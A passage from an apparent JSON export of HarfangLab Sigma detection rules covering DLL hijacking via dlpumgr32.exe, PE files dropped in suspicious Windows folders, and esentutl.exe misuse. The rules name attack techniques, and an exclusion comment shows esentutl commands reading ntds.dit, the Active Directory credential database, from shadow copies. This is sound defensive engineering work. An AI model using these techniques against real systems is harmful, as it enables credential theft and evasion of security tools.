"id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586261Z",
"creation_date": "2026-03-23T11:45:34.586266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586274Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dlpumgr32.yml",
"content": "title: DLL Hijacking via dlpumgr32.exe\nid: 118b000d-e5d7-48c7-a7cd-7f89310aa1b9\ndescription: |\n Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dlpumgr32.exe'\n ProcessSignature: 'DESlock Limited'\n ImageLoaded|endswith: '\\dlpprem32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'DESlock Limited'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9",
"rule_name": "DLL Hijacking via dlpumgr32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071551Z",
"creation_date": "2026-03-23T11:45:34.071553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071558Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_pe_written_suspicious_location.yml",
"content": "title: PE File Written in Suspicious Location\nid: 118fe9fa-f27d-4da6-bee4-85f73fe9c76c\ndescription: |\n Detects the writing of a Portable Executable file in a suspicious location.\n Attacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\n It is recommended to analyze the dropped file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2023/07/10\nmodified: 2025/11/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: filesystem_write\n product: windows\ndetection:\n selection:\n FirstBytes|startswith: '4d5a'\n\n selection_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\'\n filter_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\'\n\n selection_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\'\n filter_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\\\*\\'\n\n selection_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n filter_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\'\n\n selection_appdata_4:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n selection_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\'\n filter_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\\\*\\'\n\n selection_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\'\n filter_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\\\*\\'\n\n selection_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\'\n filter_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\\\*\\'\n\n selection_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\'\n filter_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\\\*\\'\n\n selection_debug:\n Path|startswith: '?:\\Windows\\debug\\'\n filter_debug:\n Path|startswith: '?:\\Windows\\debug\\\\*\\'\n\n selection_tracing:\n Path|startswith: '?:\\Windows\\tracing\\'\n filter_tracing:\n Path|startswith: '?:\\Windows\\tracing\\\\*\\'\n\n selection_help:\n Path|startswith: '?:\\Windows\\help\\'\n filter_help:\n Path|startswith: '?:\\Windows\\help\\\\*\\'\n\n selection_logs:\n Path|startswith: '?:\\Windows\\logs\\'\n\n selection_fonts:\n Path|startswith: '?:\\Windows\\Fonts\\'\n\n selection_programdata:\n Path|startswith: '?:\\ProgramData\\'\n filter_programdata:\n Path|startswith: '?:\\ProgramData\\\\*\\'\n\n selection_user:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\'\n - '?:\\Users\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\Links\\'\n - '?:\\Users\\\\*\\Favorites\\'\n filter_user_1:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\Music\\'\n - '?:\\Users\\\\*\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\\\*\\Links\\'\n - '?:\\Users\\\\*\\\\*\\Favorites\\'\n # Filtering out folders with 2 or more levels of depth\n filter_user_2:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Videos\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Pictures\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Contacts\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\3D Objects\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Saved Games\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Links\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Favorites\\\\*\\\\*\\'\n\n selection_inf:\n Path|startswith: '?:\\Windows\\INF\\'\n\n selection_config:\n Path|startswith: '?:\\Windows\\System32\\config\\'\n filter_config:\n Path|startswith: '?:\\Windows\\System32\\config\\\\*\\'\n\n selection_evt:\n Path|startswith: '?:\\Windows\\System32\\winevt\\'\n\n selection_public:\n Path|startswith: '?:\\Users\\Public\\'\n filter_public:\n Path|startswith: '?:\\Users\\Public\\\\*\\'\n\n selection_perflogs:\n Path|startswith: '?:\\Perflogs\\'\n filter_perflogs:\n Path|startswith: '?:\\Perflogs\\\\*\\'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_qlive:\n ProcessImage|endswith: '\\QQLive.exe'\n Path: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_sesame:\n ProcessImage|endswith: '\\Sesame.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*.dll'\n\n exclusion_itextsharp:\n Path: '?:\\Windows\\Fonts\\itextsharp.dll'\n\n exclusion_logs_pbr:\n ProcessImage:\n - '?:\\Windows\\System32\\systemsettingsadminflows.exe'\n - '?:\\WINDOWS\\system32\\omadmclient.exe'\n - '?:\\Windows\\System32\\systemreset.exe'\n - '?:\\Windows\\System32\\resetengine.exe'\n Path: '?:\\Windows\\Logs\\PBR\\\\*'\n\n exclusion_fonts:\n Path:\n - '?:\\Windows\\Fonts\\\\*.fon'\n - '?:\\Windows\\Fonts\\\\*.fot'\n - '?:\\Windows\\Fonts\\\\*.rra'\n - '?:\\Windows\\Fonts\\is-*.tmp'\n\n exclusion_explorer:\n ProcessImage: '?:\\windows\\Explorer.EXE'\n\n # When downloading files from browsers they create temporary extensions for files\n # For caching and verification. This could be reduced to a \"Downloads\" folder only.\n exclusion_browser_extensions:\n Path|endswith:\n - '.crdownload' # Chrome\n - '.part' # Firefox\n - '.partial' # Edge\n - '.download' # Safari\n - '\\Downloads\\\\????????-????-????-????-????????????.tmp'\n\n exclusion_migration_service:\n Path: '?:\\ProgramData\\UserProfileMigrationService.exe'\n\n exclusion_4kviddl:\n Path|startswith: '?:\\Users\\\\*\\Music\\4kvideodownloader\\'\n\n exclusion_tmp:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Z@H!-*-??.tmp'\n\n exclusion_public:\n Path:\n - '?:\\Users\\Public\\AnyDesk.exe'\n - '?:\\Users\\Public\\gcapi.dll'\n - '?:\\Users\\Public\\python.exe'\n - '?:\\Users\\Public\\splunkdd.exe'\n - '?:\\Users\\Public\\splunkd.exe'\n\n exclusion_roaming:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\DPInst.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\gacutil.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\PnPutil.exe'\n\n exclusion_uninstall:\n Path:\n # Files of the following format:\n # PyCharm2023.2_232.8660.197_Uninstall.exe\n - '?:\\ProgramData\\\\*20??.?_???.????.*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.????.*_Uninstall.exe'\n\n exclusion_winscp:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\winscp.rnd'\n\n exclusion_dotnet:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\bin\\Debug\\net*\\'\n - '?:\\Users\\\\*\\\\*\\bin\\Release\\net*\\'\n\n exclusion_rollbacks:\n Path|startswith:\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT_Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\\\*\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_????.tmp'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_???.tmp'\n\n exclusion_anydesk_dl:\n Path|endswith: '\\Downloads\\AnyDesk.exe'\n\n exclusion_redist:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX?.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX??.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_20??_20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\TempVC_redist.x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist.exe'\n\n exclusion_putty:\n Path: '?:\\Users\\\\*\\AppData\\Local\\PUTTY.RND'\n\n exclusion_sqlce:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlcecompact??.dll'\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlce????.dll'\n\n exclusion_clu:\n Path:\n - '?:\\Users\\\\*\\CLU_V*\\ComponentMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\expat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\libexpat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsCm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsDm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUsrApi.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RDHWebSercieMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RdsMisc.dll'\n - '?:\\Users\\\\*\\CLU_V*\\restCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RESTSDK.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RFUT.exe'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp.dll'\n - '?:\\Users\\\\*\\CLU_V*\\ServerMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\SnmpGet.exe'\n - '?:\\Users\\\\*\\CLU_V*\\soapCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapDms.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapProx.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUad.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUD.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUds.dll'\n - '?:\\Users\\\\*\\CLU_V*\\unzip32.dll'\n - '?:\\Users\\\\*\\CLU_V*\\zip32.dll'\n\n exclusion_motic_drivers:\n Path|startswith: '?:\\Windows\\INF\\Motic Drivers\\'\n\n exclusion_aee_tools:\n Path: '?:\\Users\\\\*\\AppData\\Local\\AEE-Tools'\n\n exclusion_installshield_uninstallers:\n Path:\n - '?:\\ProgramData\\\\*????.?_*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*????.?_*_Uninstall.exe'\n\n exclusion_polycom:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\PolycomCompanionSetup.exe'\n\n exclusion_bit_tmp:\n Path:\n - '?:\\ProgramData\\BIT????.tmp'\n - '?:\\ProgramData\\BIT???.tmp'\n\n exclusion_bluestacks_tmp:\n Path: '?:\\ProgramData\\BlueStacksServicesSetup.exe.tmp'\n\n exclusion_cardpresso:\n Path: '?:\\ProgramData\\cardPresso.bin'\n\n exclusion_generic_uninstaller:\n Path:\n - '?:\\ProgramData\\\\*20??.?_???.?????.??_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.?????.??_Uninstall.exe'\n\n exclusion_keypass:\n Path:\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\ShInstUtil.exe'\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\unins000.exe'\n\n exclusion_setup_prod:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SetupProd_Act.exe'\n\n exclusion_mtxagent:\n ProcessImage: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n\n # Just for fun: process used by the Spanish police to identify\n # users via their electronic identity card\n exclusion_dnieservice:\n Path: '?:\\Users\\\\*\\AppData\\Local\\DNIeService.exe'\n ProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -s CertPropSvc'\n\n exclusion_ProfSvc:\n Path: '?:\\Users\\\\*\\AppData\\Local\\{????????-????-????-????-????????????}.tmp'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bomgar:\n ProcessImage|endswith:\n - '\\bomgar-scc.exe'\n - '\\sra-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Bomgar Corporation'\n - 'BeyondTrust Corporation'\n Path:\n - '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n\n exclusion_bomgar_install:\n ProcessImage|endswith: '\\nstvstub.exe'\n ProcessCommandLine|contains|all:\n - ' --install '\n - ' --hwnd '\n Path: '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n\n exclusion_office_deployment_tool:\n ProcessImage|endswith: '\\officedeploymenttool_*.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mssense:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup?Pro.exe'\n ProcessSignature: 'Fabrice PARISOT'\n\n exclusion_tsplus:\n ProcessImage:\n - '?:\\Program Files\\TSplus\\UserDesktop\\files\\svcr.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\svcr.exe'\n ProcessSignature: 'Remote Access World SAS'\n\n exclusion_installshield:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n - '?:\\Program Files (x86)\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n\n exclusion_fastviewer:\n ProcessSigned: 'true'\n ProcessSignature: 'FastViewer GmbH'\n Path: '?:\\Users\\\\*\\Music\\exe\\\\*.tmp'\n\n exclusion_hp:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SecondaryApp.exe'\n\n exclusion_hp_devicestup:\n ProcessImage: '?:\\Program Files\\HP\\HP * series\\Bin\\DeviceSetup.exe'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Full_Webpack-* _Full_Webpack.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|startswith: '?:\\Windows\\INF\\'\n\n exclusion_installer:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\setup.exe'\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.exe'\n\n exclusion_eraser:\n ProcessImage|endswith: '\\Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rare Ideas, LLC'\n Path: '?:\\ProgramData\\\\*.dll'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|endswith: '\\{????????-????-????-????-????????????}.tmp'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\ns?????.tmp'\n Path:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n\n # LANDesk® Management Suite\n exclusion_landesk:\n ProcessImage:\n - '?:\\Windows\\Temp\\inst32.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\inst32.exe'\n ProcessDescription: 'INSTALL MFC Application'\n Path: '?:\\Windows\\Fonts\\zch????.tmp'\n\n exclusion_phpstorm:\n ProcessImage|endswith: '\\PhpStorm-????.?.?.exe'\n ProcessDescription: 'PhpStorm Windows Installer'\n Path|endswith: '\\PhpStorm????.?_*_Uninstall.exe'\n\n exclusion_proxynetworks:\n ProcessImage|endswith: '\\PhSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Proxy Networks Inc.'\n Path: '?:\\ProgramData\\PHodCln-{????????-????-????-????-????????????}.exe'\n\n exclusion_magic:\n ProcessImage:\n - '?:\\Program Files\\MagicUtilities\\MagicMouseUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicTrackpadUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicKeyboardUtilities.exe'\n Path: '?:\\ProgramData\\fnebeqbh.fxh'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Program Files\\7-Zip\\7zG.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c",
"rule_name": "PE File Written in Suspicious Location",
"rule_description": "Detects the writing of a Portable Executable file in a suspicious location.\nAttacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\nIt is recommended to analyze the dropped file for malicious content.\n",
"rule_creation_date": "2023-07-10",
"rule_modified_date": "2025-11-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "11f7107e-28d1-4486-afca-4379b68744b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627287Z",
"creation_date": "2026-03-23T11:45:34.627289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627293Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Esentutl/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1564/004/",
"https://attack.mitre.org/techniques/T1570/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0404/"
],
"name": "t1218_esentutl.yml",
"content": "title: Esentutl.exe Execution\nid: 11f7107e-28d1-4486-afca-4379b68744b3\ndescription: |\n Detects the execution of esentutl.exe, a legitimate Windows database utility.\n Adversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\n It is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1564/004/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/07/09\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1564.004\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n\n # This is handled by the rule 8610a64e-eb0f-436c-b21d-33f757ea41f0\n filter_vss:\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n - '?:\\ProgramData\\Cyvera\\LocalSystem\\Download\\protected_payload_execution\\cortex-xdr-payload.exe'\n - '?:\\Program Files\\HDCleaner\\HDCleaner.exe'\n - '?:\\Program Files\\Magnet Forensics\\Magnet AXIOM\\AXIOM Process\\AXIOMProcess.exe'\n - '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n exclusion_commandline:\n CommandLine:\n - 'esentutl.exe'\n - 'esentutl /g'\n - 'esentutl.exe /d ?:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb'\n\n exclusion_arcserve_backup:\n ParentImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy89\\Windows\\NTDS\\edb06C20.log\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy103\\Windows\\NTDS\\ntds.dit\n CommandLine:\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\edb*.log'\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\ntds.dit'\n\n # Microsoft File Replication Service\n exclusion_ntrfs:\n ParentImage: '?:\\Windows\\System32\\ntfrs.exe'\n CommandLine: 'esentutl /d ?:\\windows\\ntfrs\\jet\\ntfrs.jdb'\n\n exclusion_edblog:\n CommandLine:\n - '?:\\Windows\\system32\\esentutl.exe /? edb.log'\n - '?:\\Windows\\system32\\esentutl.exe /?? edb.log'\n\n exclusion_veritas_backup:\n ParentImage: '?:\\Program Files\\Veritas\\Backup Exec\\raws\\beremote.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "11f7107e-28d1-4486-afca-4379b68744b3",
"rule_name": "Esentutl.exe Execution",
"rule_description": "Detects the execution of esentutl.exe, a legitimate Windows database utility.\nAdversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\nIt is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\n",
"rule_creation_date": "2021-07-09",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218",
"attack.t1564.004",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12043ba4-4c8f-42df-8036-1677ede6fb84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
